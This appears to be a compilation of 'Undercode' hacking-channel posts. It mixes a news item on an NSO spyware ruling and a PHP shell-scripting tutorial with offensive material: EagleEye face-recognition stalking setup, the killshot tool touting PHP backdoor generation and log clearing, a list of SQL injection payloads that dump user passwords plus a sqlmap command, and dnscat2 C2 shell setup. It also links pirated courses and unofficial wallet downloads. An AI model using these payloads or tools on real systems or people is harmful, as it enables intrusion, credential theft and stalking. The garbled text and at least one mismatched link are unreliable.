▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Israeli court ruled that NSO can continue to export spyware
#News

> According to foreign media reports, local time this Monday, the infamous spyware company NSO Group won a major victory in Israeli courts, and critics called it a disgraceful ruling. It is understood that the court finally ruled that NSO can continue to export its hacking and surveillance work on the grounds that the human rights organization Amnesty International failed to prove that NSO customers used these technologies to monitor Amnesty employees.

> Amnesty severely accused the ruling. Danna Ingleton, Acting Co-Director of Amnesty Tech, said: “Today’s shameful ruling is a brutal blow to people who are at risk from the NSO Group’s sale of its products to infamous human rights violators. At the NSO and the Israeli Ministry of Defence When the courts were responsible for their actions, it was shocking. The NSO Group will continue to profit from human rights violations without punishment. The court’s ruling blatantly ignores the NSO Group’s spyware used to attack Extensive evidence of human rights defenders from Saudi Arabia to Mexico and the basis of this case-our own Amnesty employees. We will continue to do our best to prevent NSO spyware from being used to violate human rights."

> The NSO is obviously happy with this victory. "This judgment is irrefutable evidence that it proves that the regulatory framework we are in conforms to the highest international standards. Combined with NSO's industry-leading governance framework, we are a global leader in the proper use of technology and respect for human rights This fact has been consolidated. The advanced encryption of terrorists and criminals necessitates this legal and appropriate response provided by NSOs to government agencies authorized to be licensed."

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑for Facebook-Instagram:
> Image Recognition and Reverse Image Search Tool:

EagleEye basically performs face or image recognition over the provided image. When you enter the data such as name and a picture of a person with image recognition, it also matches the name on the social media like Facebook, YouTube, Twitter and Instagram. When it finds relevant results in the type of user profiles, it shows these results to its user. It can also search through secured and hidden profiles of persons on the social media.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣Debian-based Distros :

$ sudo apt update && sudo apt upgrade -y
$ sudo apt install git python3 python3-pip python3-dev
$ sudo apt install libgtk-3-dev libboost-all-dev build-essential cmake libffi-dev
$ git clone https://github.com/ThoughtfulDev/EagleEye
$ cd EagleEye && sudo pip3 install -r requirements.txt
$ sudo pip3 install --upgrade beautifulsoup4 html5lib spry

2️⃣Arch Linux :

$ sudo pacman -Syu
$ sudo pacman -S git python python-pip gtk3 boost cmake libffi
$ git clone https://github.com/ThoughtfulDev/EagleEye
$ cd EagleEye && sudo pip3 install -r requirements.txt
$ sudo pip3 install --upgrade beautifulsoup4 html5lib spry

3️⃣USAGE :

$ python3 eagle-eye.py -h

4️⃣Change the value in config.json to the path of the geckodriver e.g

{
"DEFAULTS": {
...
},
"WEBDRIVER": {
"ENGINE": "firefox",
"PATH": "/usr/local/bin/geckodriver"
},
"FILTER": [
....
],
...
}

5️⃣Configuration: Images
Put at least one Image of the Person you want to find in the known folder.

Supported Filetypes are: jpg/JPG, jpeg/JPEG, png/PNG, and bmp/BMP.

✅GIT 2020
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Use PHP as Shell scripting language :
#ExpertHacking BY UNDERCODE

Many people may have thought of using PHP to write some programs such as regular letter sending, but there is no way to execute PHP regularly:


1) As we all know, PHP is a very good dynamic web development language (fast speed, short development cycle...). But only a few people realize that PHP can also be a good language for writing Shell scripts. When PHP is a language for writing Shell scripts, he is not as powerful as Perl or Bash, but he has a good advantage. Especially for people like me who are familiar with PHP but not very familiar with Perl.

2) To use PHP as the shell scripting language, you must compile PHP as a binary CGI, not Apache mode; compiling it into a binary CGI mode to run PHP has some security issues. For the solution, please refer to the PHP manual (http:/ /www.php.net).
At first you may feel uncomfortable with writing shell scripts, but it will get better: the only difference between using PHP as a general dynamic web page writing language and as a shell scripting language is that a shell script needs to be explained in the first line of life The program path of this script:
We added the parameter "-1" after the PHP execution file, so that PHP will not output HTTPHeader (if you still need to be a dynamic Web page of the Web, then you need to use the header function to output HTTPHeader yourself). Of course, you still need to use PHP start and end tags in the shell script:

<?php code?>

Let us now look at an example in order to better understand the use of PHP as the shell scripting language:
<?php
print("Hello, world!n");
?>

🦑The above program will simply output "Hello, world!" to the display.

1) Pass the Shell script running parameters to PHP:
As a Shell script, some parameters are often added when running the program. When PHP is used as a Shell script, there is an embedded array "$argv". Using the "$argv" array can be very convenient. Reads the parameters when the Shell script is running ("$argv[1]" corresponds to the first parameter, "$argv[2]" corresponds to the second parameter, and so on). For example, the following program:
#!/usr/local/bin/php -q
<?php
$first_name = $argv[1];
$last_name = $argv[2];
printf("Hello, %s %s! How are you today?n" , $first_name, $last_name);
?>

2) The above code needs two parameters when running, which are the first and last name, for example, run like this:
[dbrogdon@artemis dbrogdon]$ scriptname.ph Darrell Brogdon
Shell script will output on the display:
Hello, Darrell Brogdon! How are you today?
[dbrogdon@artemis dbrogdon]$
also contains the "$argv" array when PHP is used as a dynamic webpage writing language, but there are some differences from this: "$argv[0]" when PHP is used as the shell scripting language The corresponding is the file name of the script, and when used for dynamic web page writing, "$argv[1]" corresponds to the first parameter of QueryString.

3) Write an interactive shell script:
If a shell script is only run by itself and loses its interactivity, then it doesn't make much sense. When PHP is used to write shell scripts, how to read the information entered by the user? Unfortunately, PHP itself does not have a function or method to read user input information, but we can imitate other languages ​​to write a function "read" that reads user input information:
<?php
function read() {
$fp = fopen('/dev/stdin','r');
$input = fgets($fp, 255);
fclose($fp);
return $input;
}
?>

4) It should be noted that the above function can only be used on Unix systems (other systems need to be changed accordingly). The above function will open a file pointer, and then read a line that does not exceed 255 bytes (that is, the role of fgets), and then close the file pointer and return the read information.
Now we can use the function "read" to modify the program 1 we wrote earlier to make it more "interactive":
<?php
function read() {
$fp = fopen('/dev/stdin','r');
$input = fgets($fp, 255);
fclose($fp);
return $input;
}
print(" What is your first name? ");
$first_name = read();
print("What is your last name? ");
$last_name = read();
print("nHello, $first_name $last_name! Nice to meet you! n");
?>

5) Save the above program and run it, you may see an unexpected thing: the input on the last line becomes three lines! This is because the information returned by the "read" function also includes the end newline "\n" of each line of the user, which is retained in the surname and first name. To remove the end newline, you need to modify the "read" function:
<?php
function read() {
$fp = fopen('/dev/stdin','r');
$input = fgets($fp, 255);
fclose($fp);
$input = chop($input) ; // remove trailing blank
return $input;
}
?>


3. Shell scripts written in other languages ​​include shell scripts written in PHP:
Sometimes we may need to include shell scripts written in PHP in shell scripts written in other languages. It is actually very simple, here is a simple example:
echo This is the Bash section of the code.

/usr/local/bin/php -q << EOF
<?php
print("This is the PHP section of the coden");
?>
EOF

In fact, it is to call PHP to parse the following code, and then output; then, try the following code again:
echo This is the Bash section of the code.

/usr/local/bin/php -q << EOF
<?php
$myVar ='PHP';
print("This is the $myVar section of the coden");
?>
EOF

It can be seen that the only difference between the two codes is that a variable "$myVar" is used for the second time. Try to run it, and PHP gives an error message: "Parse error: parse error in-on line 2"! This is because the variable in Bash is also "$myVar", and the Bash parser first replaces the variable. To solve this problem, you need to add the "\" escape character in front of each PHP variable, then The code just modified is as follows:
echo This is the Bash section of the code.

/usr/local/bin/php -q << EOF
<?php
\$myVar ='PHP';
print("This is the \$myVar section of the coden");
?>
EOF


Ok, now you can write your own Shell script in PHP, I hope you are well. If you have any questions, you can go to this forum to discuss.

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

EXPERT HACKING TIP BY UNDERCODE

🦑Udemy - AWS Amazon S3 Mastery Bootcamp (2019)


> https://mega.nz/folder/vcoEmYbJ#fm6FLDygKoQdTZYpXMFGpg

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 how to create native tools ?


First of all you need to store your output in the variable $sCode, which is required for just about anything you create for the suite.

There are only a couple of files you need:
- a native file
- a png image
- Data/nativeconfig.php

🦑That's it basically.
You can create any png-24 image as long as it's transparant and has the following dimensions: 48x48px.


You need to save all your native tools in the Native folder. Here's an example of a native tool. As you can see it's not different from a module or any other code in the suite. There are however some things you need to pay attention to, if you don't the native tool won't be loaded properly or at all.

You must save the variable iCFG(post) in every form, just hide it in your form (for an example just check any native tool that use post forms).

If you open the file Data/nativeconfig.php you can see that all properties are stored in an array. It works like this:
$_CONTEXT['native'][0] = array("configuration editor","edit_config.php","edit_config","edit your configuration files and it's default values");

🦑These are the properties for native tool configuration editor.

properties for the array $_CONTEXT['native'][0]:
[0]: name of the native tool
[1]: include file in Native folder associated with configuration editor
[2]: name of the image (used in the configuration menu above) in Templates/x/images (must be a PNG (check above for the properties)), so in this case your image will become: Templates/x/images/edit_config.png
[3]: description text (image hover text)

Note that all images are sorted on the array's index number. Not much else to think of, just make sure you use the iCFG variable when you post forms.


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑RUSSIAN SITES FOR BTC- from our ru grps :

1️⃣Bitcoin core
Bitcoin wallet that stores the entire blockchain. Because of this, it is very demanding on the disk space (tens of gigabytes and constantly increasing), as well as the Internet connection and RAM.

Download links from the official site + additional description and screenshots: https://softocracy.ru/prog.php?id=617

It works on three main desktop platforms (Windows, Linux, Mac OS X).

2️⃣Bitcoin Knots
Bitcoin Knots is a Bitcoin wallet derived from Bitcoin Core.

Bitcoin Knots is based on the Bitcoin Core code. Like the original wallet, it is demanding on a place in a permanent storage, on an Internet connection and RAM.

This wallet has several innovations, many of which will also be implemented in Bitcoin Core. Since the wallet has innovations, its use may be accompanied by errors.

Links: https://softocracy.ru/prog.php?id=618

3️⃣Armory
Armory is an advanced bitcoin client that expands the functionality for advanced bitcoin users. It offers many encryption and backup features, and also allows the use of secure offline storage on offline computers.

Download links: https://github.com/goatpig/BitcoinArmory/releases

4️⃣mSIGNA
mSIGNA is an advanced wallet that combines speed, simplicity and convenience with corporate-level scalability and excellent security. It supports BIP32, multi-signature transactions, offline storage, multi-device synchronization, and encrypted online and offline backups.

Links: https://electrum.org/#download

Bitcoin wallets for mobile platforms

They are naturally thin clients.

5️⃣Bitcoin wallet
Bitcoin Wallet for Android is reliable and easy to use, but it is also fast and safe. Its goals are decentralization and the absence of the need to rely on anyone: for conducting bitcoin operations, a centralized service is not required. This application is a good choice for people who are not particularly tech savvy. It is also available for BlackBerry OS.

Link: https://play.google.com/store/apps/details?id=de.schildbach.wallet

6️⃣Airbitz Bitcoin Wallet
Airbitz is a mobile bitcoin wallet that makes a high level of security, privacy and decentralization familiar and accessible to the masses. Airbitz wallets are automatically encrypted, saved, and can work even when Airbitz servers are not functioning.

Link: https://airbitz.co/bitcoin-wallet/

their is more but those most popular recommendation by Undercode

enjoy ❤️👍🏿
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A Penetration Testing Framework, Information gathering tool & Website Vulnerability Scanner
Termux-Linux

You Can use this tool to Spider your website and get important information and gather information automaticaly using whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and to find the vulnerability in your website using Cms Exploit Scanner && WebApp Vul Scanner Also You can use killshot to Scan automaticly multiple type of scan with nmap and unicorn . And With this tool You can Generate PHP Simple Backdoors upload it manual and connect to the target using killshot
This Tool Bearing A simple Ruby Fuzzer Tested on VULSERV.exe And Linux Log clear script To change the content of login paths Spider can help you to find parametre of the site and scan xss and sql

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1️⃣Linux Setup


>git clone https://github.com/bahaabdelwahed/killshot

>cd killshot

>ruby setup.rb (if setup show any error just try to install the gems/tool manual )

>ruby killshot.rb

2️⃣Windows Setup

>Download ruby for windows ==> https://rubyinstaller.org/downloads/

>Download Cmder here ==> http://cmder.net/

>Download Curl For 64/32 ==> https://curl.haxx.se/windows/

>Download nmap ==> https://nmap.org/download.html


3️⃣choose options via numbers simply

Use for learn & Enjoy !
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Website Hacking / Penetration Testing & Bug Bounty Hunting
Udemy Link:
https://www.udemy.com/course/learn-website-hacking-penetration-testing-from-scratch/

OneDriveLink:
https://mygavilan-my.sharepoint.com/:f:/g/personal/kali_masi_my_gavilan_edu/EolDahOl3oNLnu7seFeznbkBY40nWeeFwVjIlCSNLGfJkg?e=Ds0kS1

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Union Based SQL Injection :

' or 1=1#

1' ORDER BY 10#

1' UNION SELECT version(),2#

1' UNION SELECT version(),database()#

1' UNION SELECT version(),user()#

1' UNION ALL SELECT table_name,2 from information_schema.tables#

1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#

1' UNION ALL SELECT concat(user,char(58),password),2 from users#


sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs

source github
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Attacking Machine Installation:
#fastTips via Linux :

1️⃣apt-get update

2️⃣apt-get -y install ruby-dev git make g++

3️⃣gem install bundler

4️⃣git clone https://github.com/iagox86/dnscat2.git

5️⃣cd dnscat2/server

6️⃣bundle install

7️⃣Run dnscat2:

> ruby ./dnscat2.rb

8️⃣dnscat2> New session established: 1422

> dnscat2> session -i 1422

enjoy❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁